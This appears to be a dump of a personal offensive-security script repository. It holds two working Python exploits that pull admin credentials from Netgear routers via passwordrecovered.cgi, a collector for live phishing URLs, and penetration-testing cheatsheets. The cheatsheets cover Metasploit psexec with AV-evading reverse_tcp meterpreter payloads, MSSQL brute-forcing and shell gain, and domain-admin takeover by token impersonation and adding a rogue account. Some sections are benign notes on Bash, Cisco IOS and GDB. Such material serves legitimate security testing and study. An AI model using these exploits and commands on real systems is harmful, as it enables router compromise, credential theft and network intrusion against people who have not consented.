| -------------------------------------------------------------------------------- /HackerTarget_IP_Info_API/readme.md: -------------------------------------------------------------------------------- 1 | ### HackerTarget API Target Info 2 | 3 | HackerTarget_API_TargetInfo is a python script that will get Reverse DNS, GeoIP, NMAP, Traceroute and pulls HTTP Headers for Target IP address. 
4 | 5 | 6 | # Usage 7 | 8 | python HackerTarget_API_TargetInfo.py 9 | 10 | 11 | #Important Notice 12 | *It could be illegal in your country.* 13 | -------------------------------------------------------------------------------- /NetGear_Exploits/passwordrecovered_cgi_exploit.py: -------------------------------------------------------------------------------- 1 | """This can easily be reproduced using the attached poc, or by sending these two 2 | simple requests via the browser: 3 | 1. http://router/.../ will redirect you to http://router/..../unauth.cgi?id=TOKEN to acquire the token 4 | 2. http://router/passwordrecovered.cgi?id=TOKEN will give you credentials 5 | (some models require you to send a post request instead of get) 6 | """ 7 | 8 | import sys 9 | import requests 10 | 11 | 12 | def scrape(text, start_trig, end_trig): 13 | if text.find(start_trig) != -1: 14 | return text.split(start_trig, 1)[-1].split(end_trig, 1)[0] 15 | else: 16 | return "i_dont_speak_english" 17 | 18 | requests.packages.urllib3.disable_warnings() 19 | 20 | ip = sys.argv[1] 21 | port = sys.argv[2] 22 | url = 'http://' + ip + ':' + port + '/' 23 | try: 24 | r = requests.get(url) 25 | except: 26 | url = 'https://' + ip + ':' + port + '/' 27 | r = requests.get(url, verify=False) 28 | model = r.headers.get('WWW-Authenticate') 29 | if model is not None: 30 | print "Attcking: " + model[13:-1] 31 | else: 32 | print "not a netgear router" 33 | sys.exit(0) 34 | token = scrape(r.text, 'unauth.cgi?id=', '\"') 35 | if token == 'i_dont_speak_english': 36 | print "not vulnerable" 37 | sys.exit(0) 38 | print "token found: " + token 39 | #pass the token - get the password 40 | url = url + 'passwordrecovered.cgi?id=' + token 41 | r = requests.post(url, verify=False) 42 | if r.text.find('left\">') != -1: 43 | username = (repr(scrape(r.text, 'Router Admin Username', ''))) 44 | username = scrape(username, '>', '\'') 45 | password = (repr(scrape(r.text, 'Router Admin Password', ''))) 46 | password = 
scrape(password, '>', '\'') 47 | if username == "i_dont_speak_english": 48 | username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '')) 49 | password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '')) 50 | else: 51 | print "not vulnerable becuse password recovery IS set" 52 | sys.exit(0) 53 | #html encoding 54 | password = password.replace("#","#") 55 | password = password.replace("&","&") 56 | print "user: " + username 57 | print "pass: " + password 58 | -------------------------------------------------------------------------------- /NetGear_Exploits/passwrd_cgi_exploit.py: -------------------------------------------------------------------------------- 1 | """This can easily be reproduced using the attached poc, or by sending a simple 2 | request via the browser: 3 | 1. http://router/passwordrecovered.cgi?id=Example will give you credentials 4 | (some models require you to send a post request instead of get) 5 | """ 6 | 7 | import sys 8 | import requests 9 | 10 | def scrape(text, start_trig, end_trig): 11 | if text.find(start_trig) != -1: 12 | return text.split(start_trig, 1)[-1].split(end_trig, 1)[0] 13 | else: 14 | return "i_dont_speak_english" 15 | 16 | requests.packages.urllib3.disable_warnings() 17 | 18 | ip = sys.argv[1] 19 | port = sys.argv[2] 20 | url = 'http://' + ip + ':' + port + '/' 21 | try: 22 | r = requests.get(url) 23 | except: 24 | url = 'https://' + ip + ':' + port + '/' 25 | r = requests.get(url, verify=False) 26 | model = r.headers.get('WWW-Authenticate') 27 | if model is not None: 28 | print "Attcking: " + model[13:-1] 29 | else: 30 | print "not a netgear router" 31 | sys.exit(0) 32 | 33 | url = url + 'passwordrecovered.cgi?id=get_rekt' 34 | try: 35 | r = requests.post(url, verify=False) 36 | except: 37 | print "not vulnerable router" 38 | sys.exit(0) 39 | if r.text.find('left\">') != -1: 40 | username = (repr(scrape(r.text, 'Router Admin Username', ''))) 41 | username = scrape(username, '>', '\'') 42 | password = 
(repr(scrape(r.text, 'Router Admin Password', ''))) 43 | password = scrape(password, '>', '\'') 44 | if username == "i_dont_speak_english": 45 | username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '')) 46 | password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '')) 47 | else: 48 | print "not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again" 49 | sys.exit(0) 50 | #html encoding 51 | password = password.replace("#","#") 52 | password = password.replace("&","&") 53 | print "user: " + username 54 | print "pass: " + password 55 | -------------------------------------------------------------------------------- /Open_Phish/db_create.py: -------------------------------------------------------------------------------- 1 | __author__ = "Santhosh Baswa" 2 | __copyright__ = "Copyright 2016, Independent Security Research" 3 | 4 | import sqlite3 5 | import sqlite3 6 | a = raw_input("Enter the db:") 7 | conn = sqlite3.connect(a) 8 | c = conn.cursor() 9 | # Create table 10 | c.execute('''CREATE TABLE openphishdb 11 | (phishpage text, domain text ,ipaddr text)''') 12 | 13 | c.execute("INSERT INTO openphishdb VALUES ('www.google.com/search','www.google.com','8.8.8.8')") 14 | 15 | conn.commit() 16 | conn.close() 17 | -------------------------------------------------------------------------------- /Open_Phish/feed.txt: -------------------------------------------------------------------------------- 1 | http://www.t-alquds.org/wp-includes/fonts/hmr/profile.html/?ssl=yes 2 | http://www.gosgmart.com/db/itrackt/directiondereboursement 3 | http://www.gosgmart.com/image/cache/data/onsale/direction-general/redirection.php 4 | http://docsiign.ladyofelegance.net/sharingOPLy3sourcePS8tMTtVLzs/office.php 5 | http://bigappsidea.com/googledoc 6 | http://printouch.com/tmp/html/home/1a2987e61615830cc50b2ad3f54f5968 7 | 
http://srv-ine-virtual.sistine.gov.ve/images/cobaniet/zanhitroc/uleimigdale/undetiagreuz/vicele/heras/jamol.html 8 | http://verapdpf.info/db/f36d9f83f1824f4d978e79e95459f2f3 9 | http://chap.curemysinus.com/ayo/index.php/index_files/index_files/index_files/index_files/index_files/index_files/index_files/index_files/index_files/index_files/index_files/index_files/index_files/index_files/google/yahoo.jpg 10 | http://www.drdae.biz/boxdrop/1417d11d2f115b14856ffc3fab0cffc7 11 | -------------------------------------------------------------------------------- /Open_Phish/new.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/Open_Phish/new.db -------------------------------------------------------------------------------- /Open_Phish/openphish_old.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/Open_Phish/openphish_old.db -------------------------------------------------------------------------------- /Open_Phish/openphish_websites_database.py: -------------------------------------------------------------------------------- 1 | __author__ = "Santhosh Baswa" 2 | __copyright__ = "Copyright 2016, Independent Security Research" 3 | 4 | from urlparse import urlparse 5 | import re 6 | import socket 7 | import sqlite3 8 | a = raw_input("Enter the db:") 9 | conn = sqlite3.connect(a) 10 | c = conn.cursor() 11 | 12 | def host_to_ip(host): 13 | try: 14 | ips = socket.gethostbyname_ex(host) 15 | except socket.gaierror: 16 | ips=[] 17 | return ips 18 | 19 | lines = [line.rstrip('\n') for line in open('feed_1.txt')] 20 | for i in lines: 21 | parse_domain = urlparse(i) 22 | # print type(parse_domain.netloc) 23 | url = parse_domain.netloc 24 | ips = host_to_ip(url) 25 | str_ips = ','.join(map(str,list(ips))) 26 | 
#print str_ips 27 | found = re.findall(r'(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})',str_ips) 28 | if found is not None: 29 | l = list(set(found)) 30 | for j in l: 31 | print i 32 | #print db_out() 33 | #print "[+] Adding to Database" 34 | # (phishpage domain ipaddr) 35 | c.execute("INSERT INTO openphishdb (phishpage,domain,ipaddr) VALUES (?,?,?)",(str(i),str(url),str(l))) 36 | print "[+] Inserted ..!!" 37 | conn.commit() 38 | c.execute("SELECT * FROM openphishdb") 39 | for row in c: 40 | print(row) 41 | conn.close() 42 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_AIXBuild.txt: -------------------------------------------------------------------------------- 1 | loslevel: 2 | -------- 3 | 4 | Reports back on installed service pack, maintenance etc. levels of the AIX deployment. 5 | Most of these appear to return absolutely nothing or loads of information. 6 | 7 | oslevel (reports back the overall AIX version e.g. 6.1.0.0) 8 | oslevel -q (reports back known maintenance levels on the host) 9 | oslevel -rq (reports back known Recommended Maintenance Levels, think major releases) 10 | oslevel -sq (reports back known Service Packs - has returned a load of service pack numbers for me, these are useful when looking at products in relation to the service pack) 11 | 12 | e.g. 13 | oslevel -s -g 6100-08-03-1339 14 | 15 | lslpp: 16 | ------ 17 | 18 | Displays information about installed filesets/software and updates. It's particularly useful when coupled with the information returned by itself 19 | 20 | e.g. 21 | lslpp -l (lists all packages, most recent level and state of them) 22 | The package names can be passed back to it for more info, showing their patch management/application cycle. 23 | 24 | e.g. 25 | lslpp -h bos.rte - returns information regarding the updates applied to the Base Operating System package. 
bos.rte 26 | 27 | rpm: 28 | ---- 29 | 30 | Standard redhat package manager, has turned up on a few machines. 31 | 32 | rpm -qa 33 | rpm -qa --last 34 | These will report back packages installed by rpm and when. 35 | 36 | Other than those, it's the same combination of looking through directories and permissions on files. I usually end up checking through with "find" and the "-perm" flag: 37 | e.g. find /home/ -perm 777 38 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_AVBypass.txt: -------------------------------------------------------------------------------- 1 | 1. Generate executable using Veil. 2 | 3 | 2. In msfconsole setup psexec with relevant payload (windows/meterpreter/reverse_tcp) 4 | 5 | msf > use exploit/windows/smb/psexec 6 | msf exploit(psexec) > set RHOST 192.168.0.2 7 | RHOST => 192.168.0.2 8 | msf exploit(psexec) > set SMBUser user 9 | SMBUser => user 10 | msf exploit(psexec) > set SMBPass pass 11 | SMBPass => pass 12 | msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe 13 | EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe 14 | msf exploit(psexec) > exploit -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_ApacheSSL.txt: -------------------------------------------------------------------------------- 1 | # Enabling Self signed certificates on local website 2 | 3 | 1. Install OpenSSL 4 | 5 | sudo apt-get install openssl 6 | 7 | 2. Run the following command to generate the self signed SSL certificates: 8 | 9 | sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key 10 | 11 | 3. Enable SSL for Apache 12 | 13 | sudo a2enmod ssl 14 | 15 | 4. 
Put the default-ssl site available creating a symbolic link 16 | 17 | sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf 18 | 19 | 5. Edit the file default-ssl.conf 20 | 21 | sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf 22 | 23 | Change the following lines to point to the certs: 24 | 25 | SSLCertificateFile /etc/ssl/certs/server.crt 26 | SSLCertificateKeyFile /etc/ssl/private/server.key 27 | 28 | 6. Restart Apache 29 | 30 | sudo /etc/init.d/apache2 restart 31 | 32 | More information: 33 | https://hallard.me/enable-ssl-for-apache-server-in-5-minutes/ 34 | https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html 35 | http://www.akadia.com/services/ssh_test_certificate.html 36 | https://www.sslshopper.com/apache-server-ssl-installation-instructions.html 37 | http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_AttackingMSSQL.txt: -------------------------------------------------------------------------------- 1 | [+] Attacking MSSQL with Metasploit 2 | 3 | [>] Enumerate MSSQL Servers on the network: 4 | 5 | msf > use auxiliary/scanner/mssql/mssql_ping 6 | nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156 7 | Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio. 
8 | 9 | [>] Bruteforce MSSQL Database: 10 | 11 | msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login 12 | 13 | [>] Enumerate MSSQL Database: 14 | 15 | msf > use auxiliary/admin/mssql/mssql_enum 16 | 17 | [>] Gain shell using gathered credentials 18 | 19 | msf > use exploit/windows/mssql/mssql_payload 20 | msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp 21 | 22 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_BashScripting.txt: -------------------------------------------------------------------------------- 1 | Simple Bash Scripting Cheatsheet 2 | -------------------------------- 3 | 4 | [+] nano Shortcuts 5 | ctrl v Next page. 6 | ctrl y Previous page. 7 | ctrl w Where is (find). 8 | ctrl k Cut that line of text. 9 | ctrl x Exit editor. 10 | 11 | [+] Create a text file: 12 | touch file Creates an empty file. 13 | ifconfig > tmp Redirect the output of a command into a file. 14 | nano file 15 | 16 | [+] Create a file and append text to it: 17 | ifconfig > tmp 18 | echo >> tmp 19 | ping google.com -c3 >> tmp 20 | 21 | [+] How to view a file: 22 | cat file Show entire contents of file. 23 | more file Show one page at a time. Space bar for next page and (q) to exit. 24 | head file Show the first 10 lines. 25 | head -15 file Show the first 15 lines. 26 | tail file Show the last 10 lines. 27 | tail -15 file Show the last 15 lines. 28 | tail -f file Useful when viewing the output of a log file. 29 | 30 | [+] pipe 31 | cat tmp | grep Bcast Feeds the output of one process to the input of another process. 32 | 33 | [+] Processes 34 | ps aux Show all running processes for all users. 35 | kill -9 PID Forcibly kill a PID (SIGKILL). 36 | 37 | [+] Word Count 38 | wc -l tmp2 Count the number of lines in a file 39 | 40 | [+] cut 41 | -d delimiter 42 | -f fields 43 | 44 | [+] sort 45 | Sort by unique sort -u file 46 | Sort IP addresses correctly sort -t .
-k 1,1n -k 2,2n -k 3,3n -k 4,4n 47 | cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u Isolate the IP address 48 | 49 | [+] awk 50 | awk '{print $1}' file Show the 1st column. 51 | awk '{print $1,$5}' file Show the 1st and 5th columns. 52 | 53 | [+] grep 54 | grep -v Remove a single string. 55 | grep -v 'red' file 56 | 57 | [+] egrep -v 58 | Remove multiple strings egrep -v '(red|white|blue)' file 59 | 60 | [+] sed 61 | sed 's/FOO/BAR/g' file Replace FOO with BAR. 62 | sed 's/FOO//g' file Replace FOO with nothing. 63 | sed '/^FOO/d' file Remove lines that start with FOO. 64 | 65 | [+] colour 66 | 31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan 67 | echo -e "\e[1;34mThis is a blue text.\e[0m" 68 | 69 | 70 | 71 | 72 | Bash Scripts 73 | ------------ 74 | 75 | [+] Simple bash script: 76 | #!/bin/bash 77 | clear 78 | echo 79 | echo 80 | print "Hello world." 81 | 82 | [+] Make a file executable. 83 | chmod +x file 84 | chmod 755 file 85 | 86 | [+] Variables 87 | name=Bob 88 | echo $name 89 | user=$(whoami) 90 | echo $user 91 | echo 'Hello' $name. 'You are running as' $user. 92 | 93 | #!/bin/bash 94 | clear 95 | echo "Hello World" 96 | name=Bob 97 | ip=`ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1` 98 | echo "Hello" $name "Your IP address is:" $ip 99 | 100 | [+] User Input 101 | read -p "Domain: " domain 102 | 103 | #!/bin/bash 104 | echo "Please input your domain:" 105 | read -p "Domain:" domain 106 | ping -c 5 $domain 107 | 108 | [+] Check For No User Input 109 | if [ -z $domain ]; then 110 | echo 111 | echo "#########################" 112 | echo 113 | echo "Invalid choice." 
114 | echo 115 | exit 116 | fi 117 | 118 | [+] For loops 119 | #!/bin/bash 120 | 121 | for host in $(cat hosts.txt) 122 | do 123 | command $host 124 | done 125 | 126 | [+] One Liners 127 | 128 | Port Scan: 129 | for port in $(cat Ports.txt); do nc -nzv 192.168.0.1 $port & sleep 0.5; done -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_BuildReviews.txt: -------------------------------------------------------------------------------- 1 | Build Review Cheatsheet 2 | ----------------------- 3 | 4 | [+] Main tasks: 5 | 6 | Any third party installed software and all associated versions. 7 | Password policy applied locally via net accounts commands. 8 | Domain policy applied, including domain password policy. 9 | Logging settings. 10 | Running services and unquoted service paths. 11 | Permissions set on services. 12 | List of patches and hotfixes installed. 13 | Efficacy of AV solutions. May require import of a benign Eicar test file. 14 | USB policy and removable media access (including firewire, CD etc). 15 | Disk encryption (if relevant) 16 | BIOS passwords set. 17 | Proxy settings (if relevant). 18 | Nessus Scan (With Credentials). 
19 | 20 | [+] Windows Hosts: 21 | 22 | [+] Server Roles 23 | [+] Server Manager 24 | [+] System Properties 25 | [+] Default Domain Policy 26 | [+] Global Domain Policy 27 | 28 | [+] Net accounts/Users/groups/Administrators 29 | [+] IPConfig/Routing 30 | 31 | [+] Installed Programs 32 | [+] Installed System Updates 33 | [+] AV Version/Definition Dates 34 | [+] Check Computer folders 35 | 36 | [+] Firewall Configuration 37 | [+] Audit Policy 38 | [+] Password/Lockout Policy 39 | [+] Security Policy 40 | [+] User Rights Policy 41 | 42 | [+] Lanman Parameters (HKLM - System - Current Control - Services - LanmanServer - Parameters) 43 | [+] LSA (HKLM - System - Current Control - Control - LSA) 44 | [+] MSV (HKLM - System - Current Control - Control - LSA - MSV1_0) 45 | 46 | systeminfo command 47 | 48 | BIOS password 49 | boot to usb 50 | file system 51 | - encrypted? 52 | - grab /Windows/System32/config/SAM SECURITY SYSTEM 53 | - put C:\Program.exe (eg calc) 54 | 55 | Control Panel 56 | - Windows Firewall 57 | - enabled 58 | - editable 59 | - logs 60 | - System Info 61 | - Windows Update 62 | 63 | Anti-Virus 64 | - config 65 | - logs 66 | - version 67 | - dates 68 | - EICAR 69 | 70 | cmd.exe 71 | script.cmd 72 | - ipconfig /all 73 | - netstat 74 | - net accounts 75 | - net accounts /domain (review password policy) 76 | - net user hacker Password@1 /add 77 | - regedit 78 | - ping 79 | - sched 80 | - tracert 81 | - net use \\IP address_or_host name\ipc$ "" /user:"" # null session 82 | - net use 83 | - net view 84 | - net start 85 | - tasklist 86 | 87 | mount usb 88 | usb autostart 89 | 90 | copy over files 91 | - nc 92 | - enum 93 | - nmap 94 | - DIRE 95 | - EICAR 96 | 97 | # SAM files in backtrack 98 | /Windows/System32/config/SAM SECURITY SYSTEM 99 | 100 | # mounting on desktop review 101 | # mount 102 | # sda1 = client hdd, sdb2 = my usb part 2 103 | # mkdir /mnt/client-hdd 104 | # mount /dev/sda1 /mnt/client-hdd 105 | # mkdir /mnt/win-usb 106 | # mount /dev/sdb2 
/mnt/win-usb 107 | 108 | hosts file C:\Windows\System32\drivers\etc\hosts.txt 109 | 110 | SYSVOL GPO preference item, check for obscured passwords in xml 111 | http://blogs.technet.com/b/grouppolicy/archive/2008/08/04/passwords-in-group-policy-preferences.aspx 112 | 113 | The history file is readable by any authenticated user, as shown below: 114 | C:\Users\All Users\Microsoft\Group Policy\History\{A1C0C41B-D2F8-401B-A5D1-437DA197A809}\Machine\Preferences\Groups\Groups.xml 115 | The same Group Policy Preference XML configuration file is also accessible via the following UNC path on the Domain Controller, again by any authenticated user: 116 | \\Domain_Controller\sysvol\Domain_Name\Policies\{A1C0C41B-D2F8-401B-A5D1-437DA197A809}\Machine\Preferences\Groups\Groups.xml 117 | 118 | 119 | [+] Unix Based Hosts: 120 | 121 | hostname 122 | whoami 123 | uname -a 124 | cat /etc/lsb-release 125 | dmesg | grep Linux 126 | cat /etc/passwd 127 | cat /etc/sudoers 128 | netstat -antup 129 | ps -aux 130 | ps aux | grep root 131 | crontab -l 132 | /sbin/ifconfig -a 133 | iptables -L 134 | arp -e 135 | cat ~/.bash_history 136 | cat ~/.ssh/authorized_keys 137 | mount 138 | 139 | - Check installed applications 140 | - Check installed compilers/interpreters -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_CTF.txt: -------------------------------------------------------------------------------- 1 | CTF Notes 2 | --------- 3 | 4 | # Enumerate Users via Finger 5 | finger user@192.168.0.20 6 | 7 | # Show nfs shares available 8 | showmount -e 192.168.1.54 9 | 10 | # User nfspysh to mount share and create .ssh directory 11 | nfspysh -o server=192.168.0.20:/home/user 12 | mkdir .ssh 13 | cd .ssh 14 | 15 | # Generate ssh key pair 16 | ssh-keygen 17 | cp id_rsa.pub /tmp/authorized_keys 18 | 19 | # Transfer attacker public key to host 20 | put /tmp/authorized_keys 21 | exit 22 | 23 | # Login to SSH server with no 
password 24 | SSH_AUTH_SOCK=0 ssh user@192.168.0.20 25 | 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_CiscoIOS.txt: -------------------------------------------------------------------------------- 1 | Cisco IOS Command Line Cheatsheet 2 | --------------------------------- 3 | 4 | --- Verify Basic Configuration: 5 | 6 | Shows information about the switch and its interfaces, RAM, NVRAM, flash, IOS, etc. 7 | SW1# show version 8 | 9 | Shows the current configuration file stored in DRAM. 10 | SW1# show running-config 11 | 12 | Shows the configuration file stored in NVRAM which is used at first boot process. 13 | SW1# show startup-config 14 | 15 | Lists the commands currently held in the history buffer. 16 | SW1# show history 17 | 18 | Shows an overview of all interfaces, their physical status, protocol status and ip address if assigned. 19 | SW1# show ip interface brief 20 | 21 | Shows detailed information about the specified interface, its status, protocol, duplex, speed, encapsulation, last 5 min traffic. 22 | SW1# show interface vlan 1 23 | 24 | Shows the description of all interfaces 25 | SW1# show interfaces description 26 | 27 | Shows the status of all interfaces like connected or not, speed, duplex, trunk or access vlan. 28 | SW1# show interfaces status 29 | 30 | Shows the public encryption key used for SSH. 
31 | SW1# show crypto key mypubkey rsa 32 | 33 | Shows information about the leased IP address (when an interface is configured to get IP address via a dhcp server) 34 | SW1# show dhcp lease 35 | 36 | --- Router Modes: 37 | 38 | Router>: User mode = Limited to basic monitoring commands 39 | Router#: Privileged mode (exec-level mode) = Provides access to all other router commands 40 | Router(config)#: global configuration mode = Commands that affect the entire system 41 | Router(config-if)#: interface mode = Commands that affect interfaces 42 | Router(config-subif)#: subinterface mode = Commands that affect subinterfaces 43 | Router(config-line)#: line mode = Commands that affect lines (console, vty, aux…) 44 | Router(config-router)#: router configuration mode 45 | 46 | --- Changing switch hostname: 47 | 48 | Switch(config)# hostname SW1 49 | 50 | --- Configuring passwords: 51 | 52 | SW1(config)# enable secret cisco ! MD5 hash 53 | SW1(config)# enable password notcisco ! Clear text 54 | 55 | --- Securing console port: 56 | 57 | SW1(config)# line con 0 58 | SW1(config-line)# password cisco 59 | SW1(config-line)# login 60 | 61 | --- Securing terminal lines: 62 | 63 | SW1(config)# line vty 0 4 64 | SW1(config-line)# password cisco 65 | SW1(config-line)# login 66 | 67 | --- Encrypting passwords: 68 | 69 | SW1(config)# service password-encryption ! Type 7 obfuscation only: it is reversible, so it hides passwords from casual viewing but does not protect them; rely on enable secret for the privileged password 70 | 71 | --- Configuring banners: 72 | 73 | SW1(config)# banner motd $ 74 | -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 75 | UNAUTHORIZED ACCESS IS PROHIBITED 76 | -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 77 | $ 78 | 79 | --- Giving the switch an IP address: 80 | 81 | SW1(config)# interface vlan 1 82 | SW1(config-if)# ip address 172.16.1.11 255.255.255.0 ! or DHCP 83 | SW1(config-if)# no shutdown 84 | 85 | --- Setting the default gateway: 86 | 87 | SW1(config)# ip default-gateway 172.16.1.1 88 | 89 | --- Saving configuration: 90 | 91 | SW1# copy running-config startup-config 92 | Destination filename [startup-config]? !
Press enter to confirm file name. 93 | Building configuration… 94 | [OK] 95 | 96 | ! Short for write memory. 97 | SW1# wr 98 | Building configuration… 99 | [OK] -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_CookieStealing.txt: -------------------------------------------------------------------------------- 1 | [+] Cookie Stealing: 2 | 3 | [-] Start Web Service 4 | 5 | python -m SimpleHTTPServer 80 6 | 7 | [-] Use one of the following XSS payloads: 8 | 9 | 10 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_DomainAdminExploitation.txt: -------------------------------------------------------------------------------- 1 | [+] After compromising a Windows machine: 2 | 3 | [>] List the domain administrators: 4 | From Shell - net group "Domain Admins" /domain 5 | 6 | [>] Dump the hashes (Metasploit) 7 | msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE 8 | 9 | [>] Find the admins (Metasploit) 10 | spool /tmp/enumdomainusers.txt 11 | msf > use auxiliary/scanner/smb/smb_enumusers_domain 12 | msf > set smbuser Administrator 13 | msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 14 | msf > set rhosts 10.10.10.0/24 15 | msf > set threads 8 16 | msf > run 17 | 18 | msf> spool off 19 | 20 | [>] Compromise Admin's box 21 | meterpreter > load incognito 22 | meterpreter > list_tokens -u 23 | meterpreter > impersonate_token MYDOM\\adaministrator 24 | meterpreter > getuid 25 | meterpreter > shell 26 | 27 | C:\> whoami 28 | mydom\adaministrator 29 | C:\> net user hacker /add /domain 30 | C:\> net group "Domain Admins" hacker /add /domain -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_ExploitDev.txt: -------------------------------------------------------------------------------- 1 | 
Exploit Development Cheatsheet 2 | ------------------------------ 3 | 4 | [+] Fuzzing: 5 | 6 | import socket 7 | 8 | buffer = ["A"] 9 | counter = 50 10 | 11 | while len(buffer) <= 1000: 12 | buffer.append("A" * counter) 13 | counter = counter + 50 14 | 15 | for buffstring in buffer: 16 | print "Fuzzing:" + str(len(buffstring)) 17 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 18 | sock.connect( ("192.168.0.20", 5555) ) 19 | sock.send(buffstring) 20 | sock.close() 21 | 22 | 23 | [+] Bad Character Testing: 24 | 25 | "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e" 26 | "\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d" 27 | "\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c" 28 | "\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b" 29 | "\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a" 30 | "\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59" 31 | "\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68" 32 | "\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77" 33 | "\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86" 34 | "\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95" 35 | "\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4" 36 | "\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3" 37 | "\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2" 38 | "\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1" 39 | "\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 40 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef" 41 | "\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe" 42 | "\xff" 43 | 44 | 45 | [+] Structured Exception Handler (SEH) Exploitation notes 46 | 47 | - Crash the application 48 | - Check SEH overwirte (view-seh chain) 49 | - Find offset (!mona pattern_create ) 50 | - Find certain SEH references to the cyclic pattern (!mona findmsp) 51 | - Verify offset to NSEH (Next 
Exception) 52 | - Find POP/POP/RET address with mona (!mona seh -cpb ) 53 | - Add short jump into payload to jump over SEH ("\xeb\x06" + 2 bytes of padding) 54 | - Add shellcode to the payload 55 | - Ensure existing padding to make sure the crash still happens. -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_GDB.txt: -------------------------------------------------------------------------------- 1 | set disassembly-flavor intel 2 | 3 | $ cat ~/.bash_aliases | grep gdb 4 | alias gdb='gdb -quiet' 5 | 6 | Running gdb 7 | ------------------ 8 | $ gdb - run, then use file command to load object 9 | $ gdb -quiet - suppress copyright information 10 | $ gdb object - normal debug 11 | $ gdb object core - analyze core dump 12 | $ gdb object pid - attach to running process 13 | 14 | General commands 15 | ------------------ 16 | set args - set program arguments 17 | show args - show program arguments 18 | run - run the program 19 | run < file - run with input from file 20 | set follow-exec-mode new/same - set debugger response to an exec call 21 | set write - set write into executables 22 | set write off - unset write into executables 23 | continue - continue running until break 24 | finish - execute until current stack frame ends 25 | source FILE - read commands from script file 26 | shell [cmd] - run cmd in a shell 27 | display /5i $eip - display expression every time execution stops 28 | undisplay - undisplay expression number 29 | info functions - list all the functions 30 | info variables - list all the variables 31 | info registers - list most common registers 32 | info all-registers - list all registers 33 | info display - print the list of displayed expressions 34 | backtrace - print backtrace of all stack frames 35 | where - same as backtrace 36 | set disassembly-flavor intel - set disassembly style to intel/att 37 | define hook-[cmd] - actions to execute before command 38 | define
